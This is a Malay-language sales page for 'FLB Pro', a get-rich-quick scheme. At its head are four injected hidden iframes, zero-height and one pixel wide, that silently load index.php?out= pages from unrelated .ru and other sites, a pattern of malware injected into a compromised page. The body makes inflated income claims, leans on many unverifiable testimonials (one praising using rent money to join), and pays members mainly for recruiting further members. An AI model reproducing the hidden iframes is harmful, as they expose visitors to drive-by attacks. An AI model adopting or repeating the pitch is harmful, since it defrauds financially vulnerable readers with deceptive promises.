"SagUTeXYne" src="http://sitevalley.ru/kx/index.php?out=1331606723" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no">"SagUTeXYne" src="http://moto-pilot.ru/templates/rhuk_milkyway/kx/index.php?out=1331412250" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no">"SagUTeXYne" src="http://moto-pilot.ru/templates/rhuk_milkyway/kx/index.php?out=1331412250" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no">"SagUTeXYne" src="http://aandmcleaning.co.uk/templates/rhuk_milkyway/lite/index.php?out=1328461192" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"> " bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" style="background-image: url('img/bgbg.jpg'); background-position: top; background-repeat: repeat-x; background-attachment: fixed;">

Sebelum anda download laporan ekskusif "Rahsia RM245,752 Dari Rumah" pada akhir surat ini, sila baca dengan teliti kerana saya akan tunjukkan satu jalan pintas untuk anda menjana wang segera dari rumah secara automatik setiap hari dengan senang!

KLIK DISINI UNTUK BUAT DUIT DENGAN SISTEM FLB PRO

BUKTI KUKUH! BUKTI KUKUH!

"Peh boleh tahan juga dapat RM1000 walaupun cuba-cuba! Semalam dapat lagi RM400.. Canteekkk!" - Nazri, Pasir Gudang

"Bro menyesal saya tak join awal-awal dulu.. Tapi orait juga dapat RM5,200 setakat ini.. part time jek tu!" -Zulkifli Muslim, Seremban

"Memang terbukti boleh buat duit! RM47,350 dengan FLB, kini saya tak payah kerja overtime lagi... ahaks! -Masrule, Seri Alam

"Memang terkejut dapat RM24,250 dari satu laman web rahsia yang ramai orang tak tahu!! Shhh... " -Norazlina, Jasin

"Saya buat RM4,200 dengan sistem formula luar biasa - sambil pergi kursus gomen..." - Azrisham, C. Highland

"Wow!! RM21,200 daripada m2u, seronoknye" - Nur Raimi, JB

"Masyuk RM12,200 dengan teknik buat duit paling sistematik pernah saya jumpa online!" - Saiful Hazmi, Kelana Jana

"RM22,502 daripada sistem buat duit flb setakat ini, semakin murah rezeki" - Zamzuri, Alor Star

"Terkejut dapat RM13,550 walaupun tiada pengalaman internet langsung! -Nazrim, Kuala Kangsar

"Saya buat RM17,800 dengan teknik eksklusif Mohd Nizam sejak 2005 lagi!!" - Syed Akil, Kuching

"Nak nangis dapat RM300 sehari di akaun bank!" - Siti Sofiah, Muar

"Duduk rumah pun boleh dapat duit hari-hari dengan sistem flb, RM12,800 setakat ini! -Purnamawati, Kuching

"Tak sangka dapat RM4946 semudah ini"-Hairun, Bandar Seri Begawan

"20,000 list hasilnya... RM107,450 automatik dibank part time je... YAHOOO! " -Hisham, Ipoh

"Memang menjadi kali ini, tiap minggu pasti ada duit. RM100, RM200 malah RM500 tak disangka-sangka. RM8500 setakat ini masyukk!" -Mohamad Anas, Shah Alam

RM307,072.36 Jan-Ogos 2011

Siapa Lagi Mahu Menjana
RM100~RM500 Sehari Secara
Automatik DiRumah, Walaupun
Anda Tiada Produk Dan Tidak
Tahu Internet Langsung!"

Dan Ketahui Langkah Demi Langkah
Bagaimana Saya Penuhkan Akaun Bank
Saya Dengan Limpahan Wang Segera
Sehingga Ledakkannya Mencecah...

RM138,959.11 - Jan 2010 (M2U)

RM174,325.24 - Mac 2010 (M2U)

RM308,705.83 - Sept 2008 (M2U)

RM182,873.06 - Jan 2009 (Cimb)

 

"RM21,800 Dengan Sistem FLB.. Saya Simpan Dalam ASB!"

" Alhamdulillah, tengah check2 email dan kemaskini data komputer, saya telah terima email dari maybank2u. Tersenyum lebar saya dibuatnya..hehe. Saya dah agak mesti MOHD NIZAM yang bank in duit ni... MOHD NIZAM telah transfer duit ke maybank2u saya sebanyak RM 400 beberapa hari lepas.

Dan pada hari ini saya telah mengeluarkan semua duit komisen saya sebanyak RM21,800.00 untuk saya laburkan ke dalam Amanah Saham Bumiputera (ASB) sebagai bekalan masa akan datang. Amin...Inilah rezeki...Insya-ALLAH, esok pagi duit ini akan dimasukkan ke dalam ASB saya"

Beli Laptop & Galaxy Tab.. Cash!!

Bukti income saya daripada sistem FLB!

 

- Nur Raimi, Penyelia, Pasir Gudang

 

 

*Lihat Testimoni Ahli Dan Income 2011 DiBawah*

** EKSKLUSIF!! **

**Hanya Untuk Masa Terhad Sahaja**

Inilah Peluang Keemasan Untuk Anda Miliki SISTEM Yang Telah Menjana Jualan RM435,200+ Dalam Masa 7 Bulan, Dengan Nama Anda Tercatat Megah Sebagai Salah Seorang Usahawan Internet Yang DiSegani!

KLIK DISINI UNTUK BUAT DUIT DENGAN SISTEM FLB PRO

Daripada: Mohd Nizam & Nuraimi
Tarikh :

Sahabat, cuba bayangkan selepas bangun dari tidur, anda menaip satu email selama 10 minit kepada 1000 list anda. Selepas itu, anda pergi minum kopi "Latte" di Starbucks dan berjalan-jalan sambil bershopping.

Kemudian apabila pulang dirumah, anda lihat di akaun Maybank2u, RM500 telah didepositkan kedalam akaun bank anda! Mungkin anda tidak percaya bagaimana situasi ini boleh terjadi, tetapi inilah hakikat yang terpaksa anda terima apabila anda menggunakan sistem saya!

Dibawah ini adalah email yang biasa saya terima hampir setiap hari daripada Maybank2u menyatakan wang telah dimasukkan ke akaun saya.

Screen shot akaun gmail saya dipenuhi dengan email dari maybank2u

Lagi screen shot akaun gmail saya yang terbaru 2011!

Wang masuk ke akaun setiap hari secara automatik sambil tengok DVD!

Lagi ledakkan wang masuk dalam akaun m2u!

Lagi ledakkan wang masuk dalam akaun paypal!

KLIK DISINI UNTUK TEMPAHAN SISTEM FLB PRO

Okay, saya faham. Anda mungkin rasanya ianya seperti satu mimpi atau cakap kosong. Tidak mungkin duit masuk ke akaun bank dengan sendirinya. Saya harap anda boleh bersikap terbuka dan saya akan tunjukkan lebih banyak bukti pendapatan sejak 2007!

Dan ingin saya tekankan disini bahawa saya telah membangunkan bisnes pemasaran internet yang sebenarnya yang anda juga boleh mulakan, jika anda tahu bagaimana caranya! ( Sistem saya BUKAN skim cepat kaya, jualan langsung, pelaburan haram internet, sistem matrix 5x5, program amal dan pelbagai lagi scam internet yang mengarut!).

Dan jika anda fikir ianya akan berkurangan atau terhenti, anda sudah tersilap. Bila anda mulakan sistem buat duit saya wang tidak akan berhenti mengalir ke akaun anda! Sila lihat LEDAKAN penyata maybank saya pada bulan Mac 2010:

"RM174,325.24 - Mac 2010!"

Dah tengok? Takpe saya boleh tunggu... no problem!

"Dari 0 Kepada RM107,450 Di Bank Dengan FLB!

Menyesal Saya Tak Follow Awal-Awal FLB!

Mula - mula nak join program ni, 2- 3 kali
jugaklah keluar masuk bank sebab takut nak
bank in ke akaun Nizam (Formula Luar Biasa)
Dalam kepala terfikir nak join ke atau tak
nak join Formula ni...Maklum lah takut kena tipu...

Zaman sekarang ni bukan boleh percaya sangat. Tapi sekarang 2-3 kali jugak lah keluar masuk bank dalam seminggu....sebab cash out komisyen dari
Formula ni...Alhamdulillah...

Menyesal saya tak follow awal2 Formula ni. Dulu banyak jugaklah program2 merapu yang saya ingatkan betul dan boleh buat duit.. habis beratus ringgit saya keluarkan... panduan itulah, panduan inilah....hasilnya ...zerooo...habuk!

Sekarang tidak lagi, saya tersenyum riang setiap kali ke bank...kini saya mampu memperolehi pendapatan 5 angka menggunakan Formula ni...from zero to hero...Mohd Nizam the best... Formula Luar Biasanya memang power...thanks bro....

TERKINI: Pendapatan saya dengan sistem FLB ...
RM107,450!

- Mohd Hisham, Guru, Ipoh

"RM3950 Dalam Masa 6 Hari Sahaja.. part time!"

KLIK DISINI UNTUK TEMPAHAN SISTEM FLB PRO

"RM20,602.58 Dengan Sistem FLB Setakat Ini..."

"Alhamdulillah..semakin murah rezeki saya dengan produk FLB nie.. Lagi RM500 komisen yang saya terima dari saudara Mohd Nizam pada 11/8/09. Terima kasih bro!.. Ini menjadikan pendapatan terkini saya mencecah RM20,602.58!

Program yg paling betul2 saya boleh buat duit adalah bro punya beberapa produk gayapos tuu.. RM13,152 saya belasah!! Skang nie tgh promote jugak keahlian FLB.. Saya agresif promosi di akhbar , saya tahu rating pembaca2 di akhbar ni sgt tinggi..so saya ambik peluang tu untuk beriklan.. wlupun kosnya agak tinggi..tapi hasilnya amat berbaloi kerana bro punya sales letter tu betul betul 'membunuh'.

Saya buat secara part time jer..tu pun sebelah malam.. 1-2 jam mengadap PC buat promosi melalui Google.. Apa-pun thank you bro Nizam diatas kejayaan FLB nih.. Insyaallah.. Saya akan berusaha lagi untuk buat promosi yang berterusan"

- Zamzuri, Alor Star, Kedah

"RM13,152 hasil produk gayapos FLB!"

Ok, cukup untuk saya buat masa ini kerana ianya tidak penting. Yang penting sekarang bagaimana anda boleh mengambil kesempatan ini untuk buat duit bersama-sama saya!

Anda bernasib baik kerana saya akan berikan anda sistem yang sama untuk anda buat duit dengan cepat dan senang!

Shhh... Saya akan dedahkan kepada anda satu rahsia dalaman. Dekat sikit, saya tak mahu ramai orang tahu tentang formula ajaib ini.

"TERKEJUT! RM13,550 Dalam Akaun Bank!"

"Pada mulanya ada rasa takut hilang wang, tapi
cuba juga sebab selepas baca, saya dapati
agak menyakinkan segala apa yang dijelaskan
oleh Sifu Nizam.Saya gunakan sistem FLB pada Januari 2009 dan saya sendiri terkejut apabila wang masuk tanpa henti ke dalam akaun bank saya...

Jan09 = RM2,100
Feb09 = RM2,650
Mac09 = RM2,300
Apr09 = RM2,850
Mei09 = RM3,650

Jumlah = RM13,550!

Apa rahsia saya? Ikut apa yang disarankan
oleh Sifu Nizam. Tapi...saya tak ikut semuanya,
sebab sibuk. Kalau boleh memang nak ikut
kesemuanya saranan beliau. Saranan beliau
memang berkesan. Saya masih lagi bekerja
sepenuh masa dan buat part time sahaja. Saya join program ni pun dengan niat nak
majukan diri dan tambah duit. Alhamdulillah,
ada hasilnya. Kalau kita gandakan usaha kita,
kita akan diberi ganjaran lebih.

- Nazrim
Guru, Kuala Kangsar(Bukti: screenshot email Maybank2u)

 

 

Jika anda hendak buat duit diinternet, tidak kira apa juga produk yang anda jual anda mestilah mempunyai laman web yang membina list secara automatik! List yang aktif dan tidak sabar menerima maklumat daripada anda!

Jika anda tidak tahu, list ialah mereka yang berminat dengan produk yang anda tawarkan. Mereka memberikan nama dan alamat email, dari sinilah anda membina kepercayaan dengan memberikan maklumat yang berharga kepada mereka dari semasa ke semasa. Dan hasilnya? Lihat akaun bank anda meledak dengan wang tanpa anda sedari! Secara ringkasnya:

LIST = DUIT!

Hmmm... tetapi, untuk orang biasa tentu agak payah jika bermula dari bawah. Sebab itulah, sekarang saya sedang mencari 3000 yang berminat untuk saya latih sebagai Formula Luar Biasa Pro (FLB Pro)dengan membina list bersama dan buat duit secara automatik melalui internet.

Secara automatik bermakna anda akan menerima sistem buat duit yang bukan sahaja mampu membina list malah menjana pendapatan yang diluar dugaan anda selama ini! Bayangkan dengan sistem saya, walaupun anda hanya menerima RM100 sehari, ianya menjadi RM3000 sebulan atau RM36,000 setahun, RM200 sehari anda mendapat RM6000 sebulan atau RM72,000 setahun! Memang cukup berbaloi dengan hanya meluangkan masa beberapa jam seminggu sahaja!

Dan jika anda sudah bersedia untuk mengetahui sistem yang bakal meledakkan akaun bank anda dengan wang ringgit, izinkan saya memperkenalkan...

Formula Luar Biasa PRO!
Rahsia Orang Biasa Buat Duit
Secara Automatik Di Rumah!

Jika anda bernasib baik...

3000 Yang Tercepat Menjadi Ahli
FLB Pro Akan Menerima Sistem
Yang Mampu Membina 100,000 List Dan
Buat Duit Tanpa Henti Setiap Hari!

RM2,450+ Masyukk..!

"Pertama sekali terima kasih kepada saudara
Nizam yang banyak memberi tunjuk ajar. Pada
mulanya saya ragu-ragu untuk join flb pro..
tetapi dengan bukti kukuh dan lihat testimoni
orang2 yang dah berjaya buat saya tidak sabar
untuk menyertainya.Dan ternyata hanya 3 minggu menyertai saya sudah mendapat komisen RM2150+ dengan hanya duduk didepan komputer selama 20 minit sehari! Percayalah FLB pro satu perniagaan yang sangat menguntungkan. Memang rugi jika lambat menyertainya. Thanx bro! "


- Zulfadli, Pelajar, Teluk Intan

 

Adakah Anda Salah Seorang Daripada Mereka?

Formula Luar Biasa Pros mengandungi 5 Modul Eksklusif khas untuk menjana kekayaan di alaf baru ini:

Modul #1:

"Formula Luar Biasa Bagaimana
Saya Menjana RM245,752 Dengan
Bisnes Gayapos Di Rumah!"

Seperti yang anda sedia maklum, saya menjana RM245,752 dari rumah dengan bisnes gayapos sebelum saya menceburkan diri diinternet. Dalam modul #1, anda akan menerima buku dan CD - panduan lengkap bagaimana membina empayar gayapos dirumah!

Anda akan mengetahui rahsia dalaman antaranya:

Formula rahsia bagaimana saya memperolehi RM12,500 dalam masa 14 hari selepas bangun dari tidur!

Rahsia dalaman bagaimana kerja sedikit sahaja tetapi SELALU SAHAJA BERDUIT!

Strategi jangka panjang yang saya gunakan untuk menjana RM245,752 dari rumah!

10 Rahsia anda mesti tahu untuk menjadi kaya dengan gayapos dengan pantas seperti kilat!

Bagaimana dengan modal RM50 saya gandakan menjadi RM350, RM2100 dan RM8,800 dalam masa 5 minggu sahaja!

Dan bagaimana menukarkan idea anda menjadi jutaan ringgit?

Bagaimana seorang pelajar saya membuat RM25,000 dengan rampaiklan? Cukup senang jika anda tahu rahsianya.

Apakah produk-produk yang paling LARIS boleh dijual melalui pos! Dan anda juga tidak perlu menyimpan stok!

Rahsia gayapos pros Yanik Silver mendedahkan teknik menulis surat jualan yang boleh membuatkan sesiapa sahaja yang membacanya tidak sabar untuk membuka dompet dan menghulurkan wang kepada anda!!

Bagaimana menyewakan senarai nama pelanggan-pelanggan anda dan mendapat wang tambahan sehingga RM5,000 sebulan tanpa berkerja! EKSKLUSIF!!

Bagaimana seorang penganggur, Corey Rudl (sekarang jutawan!) berjaya menjual buku setebal 48 mukasurat dan membuat US$6,000,000 (6 Juta!) dalam masa 6 bulan sahaja!

Dan anda juga akan menerima 3 bonus khas bernilai RM699:

BONUS-KHAS #1: Produk TERLARIS Saya “CD-ROM 39 Rahsia Buat Duit” Anda Boleh Cetak Dan Jual Pada Harga RM50~100 Dan Simpan Semua Keuntungan 100%!

BONUS-KHAS #2: “SURAT-RAHSIA-RM55,000!” Psst… Dalam Diam Saya Menjana RM100~RM200 Sehari Dengan Surat Rahsia Yang Menakjubkan Ini!”

BONUS-KHAS #3: “RAHSIA MENJANA RM750 SEHARI DIRUMAH!” Buku Ini Anda Boleh Cetak Dan Jual Dan Simpan Semua Keuntungan 100%! (TERKINI: Salah seorang ahli FLB telah menjana RM20,000+ dengan menggunakan produk ini!)Pakej eksklusif ini akan diposkan ke rumah anda dalam tempoh selewatnya 2-3 minggu.

* Untuk Brunei & Singapura pakej ini tidak disertakan. Harap maklum.

KLIK DISINI UNTUK BUAT DUIT DENGAN SISTEM FLB PRO

WOW!! Saya Menjana RM20,000 Dengan Teknik Rahsia FLB!

" Sistem FLB PRO memang hebat, khususnya laman web (dengan sistem autoresponder). Produk-produk yang dikirim melalui Pos Ekspres juga adalah produk-produk "panas" yang setiap orang inginkan. Anda memang seorang yang kreatif dalam mencipta kaedah-kaedah menjana wang tambahan.

Untuk makluman saudara, dengan salah satu produk hakcipta yang saudara berikan, saya telah menjana lebih RM20,000 (pada harga @ RM30) sejak saya menjadi ahli FLB Pro... promosi dengan kaedah gaya pos sahaja. Dan pesanan masih datang hingga ke hari ini. Saya hanya ikut apa yang saudara tunjukkan Hebat dan terima kasih Mohd Nizam!"

- Clarence Binayu, Penampang, Sabah

 

 

Modul #2:

4 Laporan Eksklusif Jutawan Eksklusif
Untuk Ahli Formula Luar Biasa

4 laporan yang saya cipta khas untuk ahli FLB Pro sahaja, dan saya beri amaran awal bahawa laporan ini akan membuatkan minda anda terpusing kearah destinati jutawan!

Laporan Jutawan #1: "Strategi Eksklusif Bagaimana Anda Boleh Menjadi Jutawan Dalam Masa 3 Tahun!" Jika anda mengikut setiap teknik yang saya dedahkan, anda pasti mengenggam gelaran jutawan dalam masa 3 tahun dari sekarang! EKSKLUSIF!

Laporan Jutawan #2:"Rahsia Jutawan Senyap!" Saya akan dedahkan bagaimana anda boleh menjadi jutawan secara senyap walaupun anda bekerja makan gaji. Jika anda tidak mengikut teknik ini anda pasti menepuk dahi menyesal 30-40 tahun dari sekarang!

Laporan Jutawan #3: "Idea-Idea Jutawan DiBongkar!"
-Rahsia Jutawan Muda 20 Tahun
-RM450 Sehari Dengan Menjual Sehelai Kertas
-$1 Juta Dollar Daripada Kesilapan Setiausaha
-Daripada Kosong Kepada Kejayaan Dalam Masa 3 Minggu
-Rahsia 3000 Pesanan Sebulan
-Surirumah Menjana Bisnes RM500,000 Dari Rumah
-Daripada Muflis Kepada RM5 Juta Dalam 2 Tahun
-Ibu Tunggal Menjadi Jutawan Gayapos
-Menjual 1 juta Buku Tanpa Iklan
-Jutawan Lampu Hanya Daripada Rampaiklan
-Rahsia Budak 12 Tahun Menjadi Jutawan

Laporan Jutawan #4: "Satu Rahsia Yang Saya Simpan Rapi Bagaimana Saya Buat RM1000 Seminggu!" Saya akan dedahkan produk apa yang paling laris boleh anda jual dari rumah. Hanya ikut langkah yang saya berikan dan lihat akaun anda meledak dengan wang. (Psst.. tidak ramai yang tahu taktik ini)

 

RM17,800 Dengan Teknik Anda Setakat Ini!

" Apa rahsia anda sehingga hari minggu pun saya boleh dapat komisen, sehingga meledak RM1300 sehari!! Macam nak pengsan rasanya apabila saya menerima email dari maybank2u beritahu ada RM150, RM450 masuk ke akaun saya hampir SETIAP HARI! Kini saya menjana lebih RM17,800 dengan sistem anda. Nizam, tak sia-sia saya ikut saudara selama ni!"

- Syed Akil, Pensyarah, Kuching

 

Modul #3:

"Formula Luar Biasa Rahsia Internet"Video Pemasaran Internet Terkini!

Sebagai orang baru dalam dunia internet, anda perlukan setiap teknik dan strategi untuk menjana wang melalui internet! Dan tiada yang terbaik jika anda melihat teknik ini melalui video!Anda boleh mendownload 98 video terbaik kesemuanya dalam 7 strategi internet tersohor:

Videos #1: 10 'Blogging With Wordpress' Videos

Videos #2: 24 'cPanel Basics' Videos

Videos #3: 11 'Mini-Site With FrontPage' Videos

Videos #4: 11 'e-Book Mastery' Videos

Videos #5: 6 'List Building Basics' Videos

Videos #6: 5 'How To Install Scripts' Videos

Videos #7: 31 'Internet Marketing Basics' Videos

 

RM38,000 Dalam Bank Automatik!


"Saya sertai sistem anda pada awal Ogos 07, dan
setakat ini saya sudah menjana keuntungan lebih
RM38,000 dan bertambah, semuanya secara automatik! Bukan itu sahaja, saya juga mempunyai ribuan list yang boleh saya promosi dan buat jv pada masa akan datang! Sehingga Satu sahaja yang ingin saya beritahu anda Mohd Nizam, TERIMA KASIH SIFU!!" -Norakmar Said, Surirumah, Lumut

 

 

Modul #4:

"Formula Luar Biasa Rahsia Internet"50 Produk Master Resell Right Anda Boleh Jual Dan Simpan 100% Keuntungan!

Anda tidak perlu pening kepala untuk mencipta produk kerana anda akan menerima 50 produk segera ebook antarabangsa, dimana anda boleh jual seperti goreng pisang panas pada harga RM67- RM99! Setiap produk ini dilengkapi dengan surat jualan pros buat duit! (Shh... saya jual pada harga RM197 disini, sebagai ahli FLB Pro anda mendapat semua 50 ebooks terhangat ini secara PERCUMA)

Dan akhir sekali, saya seperti tidak percaya saya akan berikan teknik ini, ini kerana sehingga hari ini ahli-ahli FLB Pro senyum riang kerana telah menerima komisen berjumlah...

"RM425,860" (dan bertambah...)

Ya, sehingga hari ini lebih RM425,860 telah saya bayar sebagai komisen kepada ahli FLB Pro yang mempromosikan sistem ini. Produk saya mendapat jualan tertinggi kerana ianya MEMANG LARIS DAN BERKESAN! Noktah!

Jadi inilah masanya untuk anda mengambil kesempatan ini kerana sebagai ahli FLB Pro anda akan menerima...

Modul #5:

"Promosi Dan Buat Duit" Sasaran RM3,000 Sebulan!

Sebagai ahli FLB Pro, anda diberikan hak eksklusif ahli untuk mempromosi sistem ini dan menjana komisen lumayan 2 peringkat tanpa henti! Berapa yang anda hendak buat sebulan, terpulang kepada anda! RM1000, RM3000, RM5,000 sebulan tidak mustahil!Sebagai ahli FLB Pro akan menerima:

Link khas pengedar yang buat duit untuk anda. Anda hanya perlu promosi link khas ini tanpa henti dan lihat akaun bank anda meledak dengan cepat!

Sistem follow up automatik yang terbukti berkesan sehingga menjana RM500,000 dan bertambah! Apabila anda mempromosi sistem ini, list anda akan menerima follow up email secara automatik untuk menyakinkan mereka menyertai sistem FLB Pro. Dari kajian yang saya lakukan, sebahagian list yang menerima 20 follow up email pasti akan menyertai anda dan masyukk!

2 Peringkat komisen untuk anda menjana pendapatan automatik tanpa henti dengan mempromosikan sistem hangat FLB Pro:

Peringkat 1 = Komisen RM100 setiap jualan daripada anda. Anda menjual kepada 20 orang sebulan, anda mendapat RM100 x 10 = RM2000 sebulan tanpa berpeluh!Peringkat 2: Komisen RM50 setiap jualan daripada ahli peringkat 2 anda. Katakan 20 orang tadi menjual kepada 20 orang yang lain, komisen anda ialah RM50 x 20 x 20 = RM20,000 sebulan!

Walau hanya 10% kejayaan, anda dengan mudah buat RM3000 Sebulan!Susah dan saya tak tahu menjual melalui internet? (Saya tahu apa yang anda fikirkan...)Tidak sama sekali dengan sistem FLB Pro! Anda hanya perlu anda lakukan hanyalah promosi link khas flb dan biarkan sistem FLB Pro yang jalankan tugas seterusnya untuk anda!

Dan untuk menolong anda, saya akan berikan:

3 Teknik Promosi Automatik Internet. Saya gunakan 3 teknik ini dan menjana ratusan ribu ringgit. Saya akan tunjukan bagaimana menggunakan teknik ini walaupun anda tidak tahu tentang internet sebelum ini. Anda hanya perlu ikut apa yang saya tunjukan dan ulangi berkali-kali!

Iklan Yang Saya Gunakan Untuk Menyedut Duit! Anda gunakan iklan ini dan lihat orang berebut-rebut untuk klik link flb anda tanpa henti!

Email Promosi yang saya gunakan untuk buatkan sesiapa sahaja yang membacanya tak senang duduk selagi dia tidak klik link anda!

 

Anda lihat sendiri apa yang terjadi apabila ahli-ahli FLB Pro sendiri menggunakan 3 teknik rahsia diatas:

RM300- RM400 Seminggu DiRumah!

"Salam En. Nizam, tak pernah saya mendapat perniagaan seistimewa program En. Nizam seperti program perniagaan yang lain. Saya ni memang takde sapa nak tolong kalau berlaku apa-apa masalah kewangan, gaji suami saya tak seberapa dan ayah saya pulak dah tua dan pencen, jadi bila saya terbaca program En. Nizam, pada mulanya saya berfikiran negatif kepada program internet yang pernah diwar-warkan sebelum ini.Tapi kerana saya yakin dan beranikan diri menyertai program setelah membaca testimoni ahli yang banyak, saya sanggup korbankan duit yang sepatutnya untuk bayar sewa rumah dan hutang lain untuk bayar penyertaan FLB dan iklan, tak sampai 2 minggu dah pulang-balik modal malahan lebih daripada itu. Kini dengan senang saya buat RM300-RM400 seminggu hanya dari rumah sahaja! Terima Kasih En. Nizam kerana mencipta perniagaan seperti ini yang mana tidak perlu keluar berjumpa/bercakap dan tiada risiko kita ditipu oleh orang lain.-Purnama, Surirumah, Kuching

RM700 Dalam 9 Hari!

"Alhamdulillah & terima kasih Nizam kerana membuka peluang bisnes internet camni. Betul kata Nizam wang masuk hari-hari. Dari 17/11 hingga 25/11 aje(9 hari), saya mendapat komisen berjumlah RM700 beb. Mana nak dapat bisnes sambilan yang memberi pulangan sehari RM100 (lebih kurang le tu...). Dan sejak memulakan promosi secara online mulai 19/10, saya dah mengumpulkan lebih daripada 400 list. Mudah-mudahan bisnes kita akan terus berjaya dan usaha Nizam membantu kami di berkatiNya! Terima kasih sekali lagi!" - Shamsul, Johor Bahru

Kewangan Saya Semakin Stabil!

" Sejak join FLB pro ni, nampaknya keadaan kewangan saya semakin stabil. Saya tak perlu harapkan gaji hujung bulan saja untuk berbelanja. Terima kasih En. Nizam kerana membantu saya menjana RM5500 dengan senang! Semoga perniagaan ini akan terus berkembang dan membantu ramai lagi mereka yang mahu buat duit cara senang. Arigatto Gozaimass!- Adizakry, Universiti Malaysia Sabah

500 List dan Hasilnya RM3800!

"Saya memang kosong tentang cara buat duit dari internet. Saya mula promosi sistem flb pro dengan teknik yang saudra tunjukkan dan membina lebih 500 list dalam masa beberapa bulan. Ini adalah hasil yang saya perolehi :Jan 08 : RM850
Feb 08 : RM1250
Mac 08 : RM200
Apr 08 : RM1950

Walaupun buat secara part-time, saya telah menjana RM3800 dalam masa 4 bulan pertama 2008 sambil tengok TV!- Ramzi, Rantau Panjang

Terima Kasih!
"Nizam, terima kasih atas komisen anda.
Syukur.. alhamdulilah" -Ashik

RM500 Sehari!
"Wow! RM500 sehari! Macam tak percaya
boleh dapat camni dalam sehari tanpa
keluar peluh. Terima kasih, camnilah
baru semangat!" - Kamal

Komisen Cek!
"Nizam, boleh berikan komisen saya
dalam bentuk cek. Ada bukti bro!" -Honsey

Terkejut!
"Terkejut juga saya terima RM100. Satu
permulaan yang baik. Siapa yang dah bayar
agaknya? Terima Kasih Nizam. Harap
perniagaan kita bertambah maju."- Rizuan

Dalam Keberkatan!
"Terima kasih Mohd.Nizam, hanya Allah Taala sahajalah yang akan balas segala kebaikkan & pertolongan saudara... tambahan di saat saya sedang kesusahan sekarang ni.... mudah2an kita sama2 hidup dalam keberkatan Allah...amin..." - Liza

RM800 Sehari!
Sistem yang luar biasa pernah saya jumpa.
Saya hanya bawa trafik ke web dan hasilnya
RM800 didepositkan ke akaun saya dalam sehari!- Amer, Kuala Lumpur

 

Bagaimana Anda Boleh Buat Duit Dengan Cepat Dan Berkesan Dengan Sistem Ini?

Sila lihat apa yang akan berlaku apabila anda menggunakan sistem saya. Anda membuat promosi dan membawa pelawat ke laman khas (Jangan bimbang, saya akan tunjukkan teknik termudah untuk bawa ribuan pelawat ke laman web dalam seminggu!)

- Mereka yang berminat untuk buat duit sudah pasti akan memberikan nama dan alamat mereka apabila mengunjungi laman web ini. Mereka adalah LIST kita.

- Dari semasa ke semasa sistem akan membuat followup kepada LIST dimana mereka akan menerima tip dan teknik buat duit daripada saya, dan pada masa yang sama kita akan menawarkan pelbagai produk yang boleh menolong mereka untuk menjana pendapatan tanpa henti dari rumah!

Dan dengar ini. Jika mereka memesan sistem FLB Pro daripada anda, saya akan berikan komisen lumayan dan deposit terus ke akaun anda! Berapa komisen? Hmm bagaimana jika...

RM20,000 Deposit KeAkaun Anda?

-Bayangkan komisen untuk FLB Pro ialah RM100 untuk peringkat 1 dan RM50 untuk peringkat 2.

Katakan anda berjaya menjual FLB PRO kepada 20 orang dalam sebulan, komisen anda ialah RM100 x 20 = RM2000 pada peringkat 1. Kemudian 20 orang tadi menjual pula kepada 20 orang yang lain, komisen anda ialah RM50 x 20 x20 = RM20,000 sebulan!

-Bukan itu sahaja, jika mereka tidak memesan FLB Pro sekalipun, kita mempunyai pelbagai produk lain yang berharga antara RM50 ~ RM100 dan anda menerima komisen antara 30% ~ 50% bagi setiap jualan!!

Rahsia Bagaimana Saya Menjana RM435,752
Dalam Masa 7 Bulan DiBongkar!

Mungkin anda pernah mencuba pelbagai program atau produk diinternet dengan harapan untuk buat duit tepi tanpa satu sen pun tak dapat. Dan anda mungkin tertanya-tanya bagaimana saya mampu menjana RM435,752 dalam masa 7 bulan diinternet bermula dari bawah?

Anda tentu hendak tahu rahsianya? Ok saya akan dedahkan disini...Rahsianya ialah saya membina list dan saya membuat followup dengan memberikan tip dan teknik buat duit kepada mereka. Hasilnya RM435,752 dibank!!

Oleh itu jika anda mempromosi sistem flb, tugas anda menjadi lebih mudah kerana... List anda akan saya follow up secara automatik dengan email sama yang saya sendiri gunakan untuk menjana RM435,752 dalam masa 7 bulan!

Saya sudah setkan followup mesej POWER di autoresponder yang mempunyai mesej-mesej tip dan buat duit kepada list anda. Ini adalah penting, apabila anda selalu menulis email kepada mereka apa yang akan terjadi? Mereka percayakan anda! Dan apabila mereka percayakan anda, mereka akan memesan produk-produk yang anda rekomenkan kepada mereka dari semasa kesemasa.

AMARAN! Anda jangan berangan-angan untuk buat duit diinternet, jika anda tidak mempunyai list yang aktif dan tidak tahu bagaimana berkomunikasi dengan list anda!

Sebagai FLB PRO, kita akan bina list yang aktif dari semasa kesemasa. Saya akan tunjukkan bagaimana saya membina 5000 list dan menjana lebih RM10,256 dalam masa hanya 15 hari sahaja! Hanya ikut teknik yang saya tunjukkan dan anda mampu membina list dengan mudah!

Ya, saya tahu bagaimana hendak buat melalui email! Jangan pelik apabila anda melihat ledakkan email daripada maybank2u memenuhi peti inbox anda seperti dibawah ini dengan teknik Formula Luar Biasa yang saya akan tunjukkan...

Diatas adalah contoh email apabila saya menerima bayaran kedalam akaun maybank saya! Lihat saya buat duit setiap jam tanpa perlu buat apa-apa walaupun saya menonton DVD sepanjang hari!

46 x RM100: RM4600 Komisen Ahli Menunggu!

Sila lihat deretan komisen yang dijana oleh ahli flb pro dengan menggunakan teknik yang saya tunjukkan. Terdapat 46 ahli yang menjana komisen daripada 25-30hb April, 2008 berjumlah RM4600! Ini menunjukkan siapa sahaja boleh gunakan sistem flb pro untuk buat duit!

GEMPAR!!
Surirumah Jana RM2500 Dalam Masa
10 Hari & RM11,1000 Dalam 3 Bulan Dengan Sistem FLB Pro!
Lihat bukti...

"Saya tidak sangka boleh dapat duit setiap hari dengan FLB Pro. Pada bulan november 2007, saya menjana RM2500 dalam masa 10 hari sahaja (lihat akaun maybank diatas 164137434057)! Pendapatan saya setakat ini:

Sept 07 = RM3400!
Okt 07 = RM3350!
Nov (sehingga 22hb) = RM4350!

Jumlah : RM11,100! (3 bulan sahaja!!)

Jika surirumah boleh buat, sesiapa juga boleh! " - Norakmar, Lumut** Update terkini: Sehingga April 2008, Norakmar telah menjana lebih RM35,000 dengan sistem FLB Pro!

